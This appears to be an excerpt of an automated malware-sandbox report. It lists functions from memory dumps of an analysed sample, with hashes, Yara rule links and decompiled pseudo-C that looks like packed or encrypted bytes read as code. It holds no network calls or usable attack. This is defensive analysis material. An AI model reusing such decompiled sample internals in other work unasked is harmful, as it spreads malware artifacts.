Uniqueness

Uniqueness Score: -1.00%

Function 020F8A4B, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bf8ef3ff760c0f4166d4cf6fac1e0ba0faaa7dcbaf20c2690bbaf7c546bf0ff
Instruction ID: 6e93a2f3dda44d1e27122db1f1a92fa76eed72fa249a10f0039ac1c5870f5b58
Opcode Fuzzy Hash: 7bf8ef3ff760c0f4166d4cf6fac1e0ba0faaa7dcbaf20c2690bbaf7c546bf0ff
Instruction Fuzzy Hash: D141B1715483C58EDFB6CF348C987DABBA2AF46310F898199C99D8F686C3354641CB26

Uniqueness

Uniqueness Score: -1.00%

Function 004036F0, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f4902af1ba25c1a360153ebc9b7bea9a01cfd40523aab50f5bb0272d5bddf1
Instruction ID: 0853584255e33ec8a281578f766be75d63c13879190126ec692b198d1075f8ce
Opcode Fuzzy Hash: 92f4902af1ba25c1a360153ebc9b7bea9a01cfd40523aab50f5bb0272d5bddf1
Instruction Fuzzy Hash: FE314872A0AB698FC32ECE35910725ABFA2FE4171535195AFD153CA879C7366802CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 00404834, Relevance: .1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00404834() {
				signed char _t46;
				signed char _t47;
				signed char _t49;
				signed char _t51;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				void* _t57;
				void* _t58;
				signed int _t59;
				void* _t62;
				signed int _t63;
				void* _t64;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int _t75;

				_t47 = _t49;
				_t57 =  *_t54;
				asm("sahf");
				 *((char*)(_t57 - 0x610362cf)) =  *((char*)(_t57 - 0x610362cf)) + 1;
				 *(_t62 - 0x42ce6c09) =  *(_t62 - 0x42ce6c09) ^ _t68;
				_t69 = _t47 - 0x49784fcf;
				 *(_t68 + _t47 * 4 - 0x4e) =  *(_t68 + _t47 * 4 - 0x4e) ^ _t54;
				 *(_t47 - 0x7d) =  *(_t47 - 0x7d) ^ _t54;
				 *(_t68 - 0x62) =  *(_t68 - 0x62) ^ _t47;
				_t58 = _t57 - 1;
				 *(_t54 - 0x64) =  *(_t54 - 0x64) ^ _t47;
				 *(_t58 - 0x65) =  *(_t58 - 0x65) ^ _t46;
				_t59 = _t58 + 1;
				 *(_t64 - 1 + 1 - 0x67) =  *(_t64 - 1 + 1 - 0x67) ^ _t59;
				_pop(_t63);
				 *(_t59 - 0x6c) =  *(_t59 - 0x6c) ^ _t59;
				_pop(_t51);
				 *(_t63 - 0x6e) =  *(_t63 - 0x6e) ^ _t68;
				_push(_t63);
				 *(_t51 - 0x6f) =  *(_t51 - 0x6f) ^ _t68;
				_push(_t51);
				 *(_t63 + 0x6f + _t68 * 4) =  *(_t63 + 0x6f + _t68 * 4) ^ _t69;
				 *(_t51 - 0x56) =  *(_t51 - 0x56) ^ _t69;
				_t67 =  *_t54 * 0x2f;
				 *(_t63 + 0x31) =  *(_t63 + 0x31) & _t51;
				 *_t63 =  *_t63 ^ _t67;
				 *_t67 =  *_t67 ^ _t67;
				asm("sbb eax, 0x7d36313b");
				 *_t63 =  *_t63 ^ _t47;
				if( *_t63 <= 0) {
					L6:
					 *_t54 =  *_t54 ^ _t67;
					 *_t54 =  *_t54 ^ _t67;
					asm("into");
					asm("into");
					asm("into");
					_t55 = _t67;
					asm("into");
					asm("into");
					asm("jecxz 0xffffffd0");
					asm("into");
					asm("into");
					asm("fcmovne st0, st6");
					asm("into");
					asm("into");
					asm("into");
					asm("into");
					L7:
					asm("into");
					L8:
					asm("into");
					asm("into");
					 *_t55 =  *_t55 ^ _t67;
					L9:
					 *_t55 =  *_t55 ^ _t67;
					_t56 = _t55 ^ _t63;
					L10:
					asm("out dx, al");
					asm("sti");
					_t55 = _t56 ^ _t67;
					L11:
					goto L8;
				}
				asm("insb");
				asm("wait");
				_push(0x6c835831);
				 *_t54 =  *_t54 ^ _t47;
				 *_t63 =  *_t63 | _t54;
				 *(_t54 + 0x787a316a) =  *(_t54 + 0x787a316a) ^ _t54;
				_t55 = _t54 + 1;
				 *_t47 =  *_t47 ^ 0xad7a3171;
				_t75 =  *_t47;
				if(_t75 > 0) {
					goto L7;
				}
				asm("adc [esi], ch");
				if(_t75 > 0) {
					goto L9;
				}
				asm("adc [esi], ch");
				if(_t75 > 0) {
					goto L10;
				}
				asm("adc [esi], ch");
				if(_t75 > 0) {
					goto L11;
				}
				_pop(ss);
				asm("adc eax, 0x1f01316b");
				 *0xad7a3171 =  *0xad7a3171 ^ _t47;
				 *(_t63 + 0x31) =  *(_t63 + 0x31) + _t47;
				_t47 = _t47 | 0x0000000a;
				goto L6;
			}

0x00404834
0x00404836
0x00404838
0x00404839
0x0040483f
0x00404845
0x0040484b
0x0040484f
0x00404853
0x00404856
0x00404857
0x0040485b
0x0040485e
0x0040485f
0x00404862
0x00404863
0x00404866
0x00404867
0x0040486a
0x0040486b
0x0040486e
0x0040486f
0x00404873
0x00404876
0x0040487c
0x00404883
0x00404887
0x00404889
0x00404893
0x0040489a
0x004048cd
0x004048d0
0x004048d2
0x004048d4
0x004048d5
0x004048d6
0x004048d7
0x004048d9
0x004048da
0x004048db
0x004048dd
0x004048de
0x004048df
0x004048e1
0x004048e2
0x004048e3
0x004048e4
0x004048e5
0x004048e5
0x004048e6
0x004048e6
0x004048e7
0x004048e8
0x004048e9
0x004048e9
0x004048eb
0x004048ed
0x004048ed
0x004048ee
0x004048ef
0x004048f1
0x00000000
0x004048f1
0x0040489c
0x0040489d
0x0040489e
0x004048a3
0x004048a5
0x004048a7
0x004048ae
0x004048af
0x004048af
0x004048b1
0x00000000
0x00000000
0x004048b4
0x004048b6
0x00000000
0x00000000
0x004048b8
0x004048ba
0x00000000
0x00000000
0x004048bc
0x004048be
0x00000000
0x00000000
0x004048c0
0x004048c1
0x004048c7
0x004048c9
0x004048cc
0x00000000

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a810e7b188d540b6655b6621e4a4606116585e5ce81ea93e1e33dadc8f2261f
Instruction ID: b63c9ef4bed44071b917e39e7812cb4e3057ca1ce486d16529b29c9f3e00a0d2
Opcode Fuzzy Hash: 0a810e7b188d540b6655b6621e4a4606116585e5ce81ea93e1e33dadc8f2261f
Instruction Fuzzy Hash: 4931783A8097E68FC72EDF75841714BBF62FE8270836898AED483DA472D3350851CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00404534, Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00404534() {
				signed char _t60;
				signed int _t61;
				signed int _t65;
				void* _t69;
				signed int _t71;
				signed int _t72;
				signed int* _t73;
				signed int _t74;
				signed char _t75;
				signed int _t76;
				void* _t77;
				signed int _t79;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				signed int _t90;
				signed int _t91;

				_t79 = _t90;
				_t82 = _t71;
				_t61 = _t60 & 0x00000085;
				 *(_t79 - 0x62ce7c1f) =  *(_t79 - 0x62ce7c1f) ^ _t65;
				asm("cld");
				asm("sahf");
				 *(_t82 - 0x5cce6505) =  *(_t82 - 0x5cce6505) ^ _t75;
				fs =  *((intOrPtr*)(_t82 - 0x4878b1cf));
				 *(_t75 - 0x7e) =  *(_t75 - 0x7e) ^ _t71;
				_t83 = _t82 + 1;
				 *(_t79 + 0x31) =  *(_t79 + 0x31) | 0x00000042;
				asm("sahf");
				 *(_t83 - 0x63) =  *(_t83 - 0x63) ^ 0x30;
				 *(_t75 - 0x65) =  *(_t75 - 0x65) ^ 0x30;
				 *(_t83 - 0x6a) =  *(_t83 - 0x6a) ^ _t75;
				_pop(_t81);
				 *(_t75 - 0x6c) =  *(_t75 - 0x6c) ^ _t75;
				_pop(_t69);
				 *(_t81 - 0x6e) =  *(_t81 - 0x6e) ^ _t89;
				_push(_t81);
				 *(_t83 - 0x5c) =  *(_t83 - 0x5c) ^ _t83;
				 *[fs:edi] =  *[fs:edi] ^ _t89;
				ss = _t61;
				 *_t81 =  *_t81 ^ _t81;
				_t72 = _t71 +  *_t61;
				 *(_t69 + _t61) =  *(_t69 + _t61) ^ _t81;
				 *[es:edx] =  *[es:edx] ^ _t90;
				_t84 = _t83 -  *_t72;
				asm("adc [edi+0x7], ecx");
				 *(_t89 - 0x58) =  *(_t89 - 0x58) ^ _t81;
				 *[gs:ebp-0x63] =  *[gs:ebp-0x63] ^ _t75;
				_push(_t72);
				 *(_t81 + 0x59 + _t72 * 4) =  *(_t81 + 0x59 + _t72 * 4) ^ _t61;
				 *(_t69 - 0x45cea106) =  *(_t69 - 0x45cea106) ^ _t84;
				asm("out 0x42, eax");
				 *(_t75 - 0x5fcebb12) =  *(_t75 - 0x5fcebb12) ^ _t90;
				asm("out dx, eax");
				_t91 = _t90 + 1;
				 *(_t75 - 0x4bcebf17) =  *(_t75 - 0x4bcebf17) ^ _t81;
				asm("loop 0x5e");
				 *(_t81 - 4) =  *(_t81 - 4) ^ _t72;
				 *_t61 =  *_t61 ^ _t72;
				if( *_t61 >= 0) {
					_push(_t61);
					 *0x23311f47 =  *0x23311f47 ^ _t75;
					_push(cs);
					_t85 = _t84 -  *_t72;
					_t76 = _t75 &  *_t72;
					 *_t85 =  *_t85 ^ _t76;
					 *(_t76 - 0x55) =  *(_t76 - 0x55) ^ _t81;
					asm("pushad");
					 *0xFFFFFFFFFFFFFFA5 =  *0xFFFFFFFFFFFFFFA5 ^ _t76;
					asm("outsb");
					 *(_t76 - 0x74) =  *(_t76 - 0x74) ^ 0x00000008;
					 *(_t81 - 5) =  *(_t81 - 5) ^ _t72;
					_t77 = _t91;
					 *(_t85 - 0x5ecea11e) =  *(_t85 - 0x5ecea11e) ^ _t85;
					asm("in al, dx");
					 *(_t77 + 1 - 0x40cebb12) =  *(_t77 + 1 - 0x40cebb12) ^ _t91;
					while(1) {
						asm("out dx, al");
						asm("sti");
						_t72 = _t72 ^ _t85;
						asm("into");
						asm("into");
						asm("into");
						 *_t72 =  *_t72 ^ _t85;
						 *_t72 =  *_t72 ^ _t85;
						asm("stc");
					}
				}
				 *(_t75 + 0x63) =  *(_t75 + 0x63) ^ _t91;
				 *(_t84 - 1 + 0x67) =  *(_t84 - 1 + 0x67) ^ _t91;
				 *(_t61 + 0x5043149) =  *(_t61 + 0x5043149) ^ _t61;
				_t73 = _t72 - 1;
				 *0x49050431 =  *0x49050431 ^ _t61;
				_pop(es);
				 *(_t61 - 1 + 0x71) =  *(_t61 - 1 + 0x71) ^ 0x49050431;
				 *_t73 =  *_t73 ^ 0x49050431;
				 *_t73 =  *_t73 ^ 0x49050431;
				asm("into");
				asm("into");
				_t74 = 0x49050431;
				asm("into");
				asm("into");
				asm("jecxz 0xffffffd0");
				asm("into");
				asm("into");
				asm("fcmovne st0, st6");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				L3:
				asm("into");
				asm("into");
				asm("into");
				 *_t74 =  *_t74 ^ 0x49050431;
				 *_t74 =  *_t74 ^ 0x49050431;
				asm("stc");
				asm("out dx, al");
				asm("cli");
				_t74 = _t74 ^ 0x49050431;
				goto L3;
			}

0x00404534
0x00404536
0x00404538
0x0040453b
0x00404541
0x00404542
0x00404543
0x00404549
0x0040454f
0x00404554
0x00404555
0x00404559
0x0040455b
0x0040455f
0x00404563
0x00404566
0x00404567
0x0040456a
0x0040456b
0x0040456e
0x0040456f
0x00404572
0x00404576
0x00404577
0x00404579
0x0040457b
0x0040457e
0x00404582
0x00404584
0x00404587
0x0040458a
0x0040458e
0x0040458f
0x00404593
0x00404599
0x0040459b
0x004045a1
0x004045a2
0x004045a3
0x004045a9
0x004045ab
0x004045af
0x004045b1
0x00404632
0x00404633
0x00404639
0x0040463a
0x0040463e
0x00404647
0x0040464b
0x0040464e
0x0040464f
0x00404652
0x00404653
0x00404657
0x0040465a
0x0040465b
0x00404661
0x00404663
0x004046ad
0x004046ad
0x004046ae
0x004046af
0x004046a5
0x004046a6
0x004046a7
0x004046a8
0x004046aa
0x004046ac
0x004046ac
0x004046ad
0x004045b3
0x004045b7
0x004045bf
0x004045c6
0x004045c7
0x004045c9
0x004045cb
0x004045cf
0x004045d1
0x004045d5
0x004045d6
0x004045d7
0x004045d9
0x004045da
0x004045db
0x004045dd
0x004045de
0x004045df
0x004045e1
0x004045e2
0x004045e3
0x004045e4
0x004045e5
0x004045e5
0x004045e6
0x004045e7
0x004045e8
0x004045ea
0x004045ec
0x004045ed
0x004045ee
0x004045ef
0x00000000

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbce78682df96a69405bf8bb06e62915dc3f52b46b9547227fd86a761be4da9e
Instruction ID: 492cc0e88484bc2eb32296d1d8666a68a8cd0ae7e48927794cd3683613c57e7a
Opcode Fuzzy Hash: fbce78682df96a69405bf8bb06e62915dc3f52b46b9547227fd86a761be4da9e
Instruction Fuzzy Hash: 71212E769082169FD31ECE35844315AFBB1FB82714B6698AEA587CA870D3362855CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00404774, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6527d3bd9cf96cbfc9340a2233270e638b15bbced1ae82cfcbccd358eb0412
Instruction ID: b3b8e9129dff1eaee09833095d04a0f630a9c2d74e5ad944ca89d653bc830cab
Opcode Fuzzy Hash: 3d6527d3bd9cf96cbfc9340a2233270e638b15bbced1ae82cfcbccd358eb0412
Instruction Fuzzy Hash: 822157368092A6CBD729DF35C14318ABFB1FF867047A694AED493DE972C3365412CB80

Uniqueness

Uniqueness Score: -1.00%

Function 004034F4, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b6f446d2ab04d6d566957f1b5468cc45f73a1a75f0f8e2bc7648aac9cf9c66
Instruction ID: 01d0d03b1fc583df2d770caf2a7331536ec90feea5ca9f7378c7811fc0865ecf
Opcode Fuzzy Hash: 52b6f446d2ab04d6d566957f1b5468cc45f73a1a75f0f8e2bc7648aac9cf9c66
Instruction Fuzzy Hash: 8D21FF719193A5CFC31FCE38844B146BF60AF47600B6492AED992CF671DB762812DBC2

Uniqueness

Uniqueness Score: -1.00%

Function 004045F4, Relevance: .1, Instructions: 54
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E004045F4() {
				signed int _t40;
				void* _t45;
				signed int _t48;
				signed int _t49;
				signed char _t50;
				signed int _t51;
				void* _t52;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed int _t58;
				void* _t59;
				signed int _t60;

				_t50 =  *_t49;
				 *_t49 =  *_t49 ^ 0x0000009a;
				asm("std");
				asm("sahf");
				 *((_t40 & 0xe19f3182) - 0x44ce6a09) =  *((_t40 & 0xe19f3182) - 0x44ce6a09) ^ _t50;
				 *(_t48 - 0x7e) =  *(_t48 - 0x7e) ^ _t49;
				_t55 = _t59 + 1;
				 *(_t49 + _t56 + 0x43) =  *(_t49 + _t56 + 0x43) | 0x5f31489f;
				asm("popfd");
				_t60 = _t59 + 1;
				 *0xFFFFFFFFFFFFFFC9 =  *0xFFFFFFFFFFFFFFC9 ^ _t48;
				 *(_t56 + 0x5c + _t50 * 4) =  *(_t56 + 0x5c + _t50 * 4) ^ _t50;
				 *0xFFFFFFFFFFFFFFC7 =  *0xFFFFFFFFFFFFFFC7 ^ _t50;
				_pop(_t45);
				 *(_t48 + 0x54 + _t50 * 4) =  *(_t48 + 0x54 + _t50 * 4) ^ _t58;
				 *(_t45 - 0x52) =  *(_t45 - 0x52) ^ _t58;
				_push(_t45);
				 *0x23311f47 =  *0x23311f47 ^ _t50;
				_push(cs);
				_t57 = _t56 -  *_t49;
				_t51 = _t50 &  *_t49;
				 *_t57 =  *_t57 ^ _t51;
				 *(_t51 - 0x55) =  *(_t51 - 0x55) ^ _t55;
				asm("pushad");
				 *0xFFFFFFFFFFFFFFA5 =  *0xFFFFFFFFFFFFFFA5 ^ _t51;
				asm("outsb");
				 *(_t51 - 0x74) =  *(_t51 - 0x74) ^ 0x00000008;
				 *(_t55 - 5) =  *(_t55 - 5) ^ _t49;
				_t52 = _t60;
				 *(_t57 - 0x5ecea11e) =  *(_t57 - 0x5ecea11e) ^ _t57;
				asm("in al, dx");
				 *(_t52 + 1 - 0x40cebb12) =  *(_t52 + 1 - 0x40cebb12) ^ _t60;
				while(1) {
					asm("out dx, al");
					asm("sti");
					_t49 = _t49 ^ _t57;
					asm("into");
					asm("into");
					asm("into");
					 *_t49 =  *_t49 ^ _t57;
					 *_t49 =  *_t49 ^ _t57;
					asm("stc");
				}
			}

0x004045f6
0x004045fe
0x00404601
0x00404602
0x00404603
0x0040460f
0x00404614
0x00404615
0x0040461d
0x0040461e
0x0040461f
0x00404623
0x00404627
0x0040462a
0x0040462b
0x0040462f
0x00404632
0x00404633
0x00404639
0x0040463a
0x0040463e
0x00404647
0x0040464b
0x0040464e
0x0040464f
0x00404652
0x00404653
0x00404657
0x0040465a
0x0040465b
0x00404661
0x00404663
0x004046ad
0x004046ad
0x004046ae
0x004046af
0x004046a5
0x004046a6
0x004046a7
0x004046a8
0x004046aa
0x004046ac
0x004046ac

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32886bd4ee89150967b70ad91ce70132d53662dece5cb41ac6226894c50a70a1
Instruction ID: aabb920f0300946228b0ab0126a5f6cf6712f7f522ef10366341ad8d90cf45de
Opcode Fuzzy Hash: 32886bd4ee89150967b70ad91ce70132d53662dece5cb41ac6226894c50a70a1
Instruction Fuzzy Hash: F61145728096818FC31DCF35C50756ABFB2FE8270836591AED592CA475C33A2A22DF41

Uniqueness

Uniqueness Score: -1.00%

Function 020F424C, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc658e5d7c891cb8a701ec3c4bd3a1fe47edee5c0666e2c2296f3a0dcaab00f
Instruction ID: c985ae3d3ecf31c575ec053095276a164a27296e22c5e5c303ea1c4bcf474a42
Opcode Fuzzy Hash: 0bc658e5d7c891cb8a701ec3c4bd3a1fe47edee5c0666e2c2296f3a0dcaab00f
Instruction Fuzzy Hash: 24113435544300DFCB689E75DDE17EB76E0AF08350F41050DEECAA6261C3344681CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00404418, Relevance: .0, Instructions: 47
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00404418() {
				signed int _t113;
				signed char _t114;
				signed int _t115;
				signed int _t118;
				signed int _t119;
				signed int _t123;
				void* _t124;
				signed char _t126;
				signed int _t127;
				void* _t131;
				signed int _t132;
				signed int _t133;
				signed int* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed char _t138;
				signed int _t139;
				signed int _t140;
				void* _t141;
				signed int _t143;
				signed int _t145;
				signed int _t149;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;

				asm("in eax, 0x40");
				 *(_t143 - 4) =  *(_t143 - 4) ^ _t126;
				_pop(_t137);
				 *(_t158 - 0xb) =  *(_t158 - 0xb) ^ _t113;
				_push(_t158);
				 *(_t137 - 0x73) =  *(_t137 - 0x73) ^ _t123;
				_push(_t113);
				 *(_t158 - 0x79) =  *(_t158 - 0x79) ^ _t137;
				asm("insd");
				 *(_t143 - 0x7f) =  *(_t143 - 0x7f) ^ _t158;
				_push(0x7f760b31);
				 *(_t113 + 0x60) =  *(_t113 + 0x60) ^ _t163;
				_t164 = _t163 - 1;
				 *(_t123 + 0x68) =  *(_t123 + 0x68) ^ _t158;
				_t114 =  *0x4a090831;
				 *_t114 =  *_t114 ^ _t126;
				 *(_t137 + 0x31) =  *(_t137 + 0x31) | _t126;
				_t127 = _t126 |  *_t123;
				_t159 = _t158 - 1;
				 *(_t137 + 0x73) =  *(_t137 + 0x73) ^ 0xb63147ea;
				 *_t127 =  *_t127 ^ 0xb63147ea;
				 *_t127 =  *_t127 ^ 0xb63147ea;
				_t149 = 0xffffffffb63147eb ^ _t127;
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("jecxz 0xffffffd0");
				asm("into");
				asm("into");
				asm("fcmovne st0, st6");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				 *0xb63147ea =  *0xb63147ea ^ 0xb63147ea;
				 *0xb63147ea =  *0xb63147ea ^ 0xb63147ea;
				asm("stc");
				_t138 = _t137 >> 1;
				do {
					_t115 = _t114 & 0x00000085;
					 *(_t149 - 0x63ce7c1f) =  *(_t149 - 0x63ce7c1f) ^ _t123;
					 *0xFFFFFFFF9FFA9B31 =  *((char*)(0xffffffff9ffa9b31)) + 1;
					 *(_t138 - 0x4dce6e0e) =  *(_t138 - 0x4dce6e0e) ^ _t159;
					_t25 = _t115 - 0x4d7ab2cf;
					_t26 = _t123;
					_t123 =  *_t25;
					 *_t25 = _t26;
					 *(_t115 - 0x7d) =  *(_t115 - 0x7d) ^ 0;
					 *(_t159 - 0x62) =  *(_t159 - 0x62) ^ _t115;
					_t139 = _t138 - 1;
					 *0xFFFFFFFFFFFFFF9C =  *0xFFFFFFFFFFFFFF9C ^ _t115;
					_t151 = _t149 - 1 + 1;
					 *(_t159 - 0x66) =  *(_t159 - 0x66) ^ _t123;
					 *0xFFFFFFFFFFFFFF99 =  *0xFFFFFFFFFFFFFF99 ^ _t123;
					 *(_t159 + 1 - 0x69) =  *(_t159 + 1 - 0x69) ^ _t139;
					_pop(_t161);
					 *0xFFFFFFFFFFFFFF96 =  *0xFFFFFFFFFFFFFF96 ^ _t139;
					_pop(0);
					 *0x00000000 =  *0x00000000 ^ _t115;
					_t138 = 0x71;
					 *_t151 =  *_t151 ^ _t164;
					if( *_t151 >= 0) {
						L5:
						 *(_t115 - 0xf) =  *(_t115 - 0xf) ^ 0;
						_t162 = _t164;
						 *(_t143 + _t143 * 8 - 0x1741cebe) =  *(_t143 + _t143 * 8 - 0x1741cebe) ^ _t151;
						 *(0 + _t138 * 8 - 0x125fceb8) =  *(0 + _t138 * 8 - 0x125fceb8) ^ _t164;
						_t145 = _t143 + 2;
						 *0xFFFFFFFFB13140E6 =  *0xFFFFFFFFB13140E6 ^ _t145;
						asm("loope 0x5f");
						 *(_t115 - 8) =  *(_t115 - 8) ^ 0;
						_pop(_t131);
						 *(_t123 - 0xe) =  *(_t123 - 0xe) ^ _t115;
						 *(_t115 + 0x63 + _t145 * 4) =  *(_t115 + 0x63 + _t145 * 4) ^ _t145;
						 *_t115 =  *_t115 ^ _t123;
						asm("sbb [eax+0x31], esp");
						_t124 = _t123 + 1;
						_t132 = _t115 + 1;
						 *_t138 =  *_t138 ^ _t132;
						_t133 = _t132 |  *(_t162 + 0x31);
						es = es;
						_t118 = _t131 - 1;
						 *_t151 =  *_t151 ^ _t118;
						es = _t138;
						_t119 = _t118 - 1;
						 *_t119 =  *_t119 ^ _t133;
						_t75 = _t124 + 0x31;
						 *_t75 =  *(_t124 + 0x31) | _t133;
						if( *_t75 >= 0) {
							 *[es:edx] =  *[es:edx] ^ _t164;
							_t152 = _t151 -  *_t133;
							asm("adc [edi+0x7], ecx");
							 *(_t162 - 0x58) =  *(_t162 - 0x58) ^ _t145;
							 *[gs:ebp-0x63] =  *[gs:ebp-0x63] ^ _t138;
							_push(_t133);
							 *(_t145 + 0x59 + _t133 * 4) =  *(_t145 + 0x59 + _t133 * 4) ^ _t119;
							 *(_t124 - 0x45cea106) =  *(_t124 - 0x45cea106) ^ _t152;
							asm("out 0x42, eax");
							 *(_t138 - 0x5fcebb12) =  *(_t138 - 0x5fcebb12) ^ _t164;
							asm("out dx, eax");
							_t165 = _t164 + 1;
							 *(_t138 - 0x4bcebf17) =  *(_t138 - 0x4bcebf17) ^ _t145;
							asm("loop 0x5e");
							 *(_t145 - 4) =  *(_t145 - 4) ^ _t133;
							 *_t119 =  *_t119 ^ _t133;
							if( *_t119 >= 0) {
								_push(_t119);
								 *0x23311f47 =  *0x23311f47 ^ _t138;
								_push(cs);
								_t153 = _t152 -  *_t133;
								_t140 = _t138 &  *_t133;
								 *_t153 =  *_t153 ^ _t140;
								 *(_t140 - 0x55) =  *(_t140 - 0x55) ^ _t145;
								asm("pushad");
								 *0xFFFFFFFFFFFFFFA5 =  *0xFFFFFFFFFFFFFFA5 ^ _t140;
								asm("outsb");
								 *(_t140 - 0x74) =  *(_t140 - 0x74) ^ 0x00000008;
								 *(_t145 - 5) =  *(_t145 - 5) ^ _t133;
								_t141 = _t165;
								 *(_t153 - 0x5ecea11e) =  *(_t153 - 0x5ecea11e) ^ _t153;
								asm("in al, dx");
								 *(_t141 + 1 - 0x40cebb12) =  *(_t141 + 1 - 0x40cebb12) ^ _t165;
								while(1) {
									asm("out dx, al");
									asm("sti");
									_t133 = _t133 ^ _t153;
									asm("into");
									asm("into");
									asm("into");
									 *_t133 =  *_t133 ^ _t153;
									 *_t133 =  *_t133 ^ _t153;
									asm("stc");
								}
							}
							 *(_t138 + 0x63) =  *(_t138 + 0x63) ^ _t165;
							 *(_t152 - 1 + 0x67) =  *(_t152 - 1 + 0x67) ^ _t165;
							 *(_t119 + 0x5043149) =  *(_t119 + 0x5043149) ^ _t119;
							_t134 = _t133 - 1;
							 *0x49050431 =  *0x49050431 ^ _t119;
							_pop(es);
							 *(_t119 - 1 + 0x71) =  *(_t119 - 1 + 0x71) ^ 0x49050431;
							 *_t134 =  *_t134 ^ 0x49050431;
							 *_t134 =  *_t134 ^ 0x49050431;
							asm("into");
							asm("into");
							_t135 = 0x49050431;
							asm("into");
							asm("into");
							asm("jecxz 0xffffffd0");
							asm("into");
							asm("into");
							asm("fcmovne st0, st6");
							asm("into");
							asm("into");
							asm("into");
							asm("into");
							L10:
							asm("into");
							asm("into");
							asm("into");
							 *_t135 =  *_t135 ^ 0x49050431;
							 *_t135 =  *_t135 ^ 0x49050431;
							asm("stc");
							asm("out dx, al");
							asm("cli");
							_t135 = _t135 ^ 0x49050431;
							goto L10;
						}
						 *_t133 =  *_t133 ^ _t151;
						 *_t133 =  *_t133 ^ _t151;
						_t157 = _t151 ^ _t133;
						asm("into");
						asm("into");
						_t136 = _t157;
						asm("into");
						asm("into");
						asm("jecxz 0xffffffd0");
						asm("into");
						asm("into");
						asm("fcmovne st0, st6");
						asm("into");
						asm("into");
						asm("into");
						asm("into");
						L7:
						asm("into");
						asm("into");
						asm("into");
						 *_t136 =  *_t136 ^ _t157;
						 *_t136 =  *_t136 ^ _t157;
						asm("stc");
						asm("out dx, al");
						asm("cli");
						_t136 = _t136 ^ _t157;
						goto L7;
					}
					 *_t143 =  *_t143 ^ _t143;
					_t159 = _t161 +  *_t123;
					 *(_t115 + _t143 * 2) =  *(_t115 + _t143 * 2) ^ _t164;
					_t114 = _t115 - 0x31;
					_t149 = _t151 + 1;
					 *0x00000000 =  *0x00000000 + _t149;
				} while ( *0x00000000 > 0);
				 *(_t149 - 0x64) =  *(_t149 - 0x64) ^ 0x00000071;
				goto L5;
			}

0x0040441d
0x0040441f
0x00404422
0x00404423
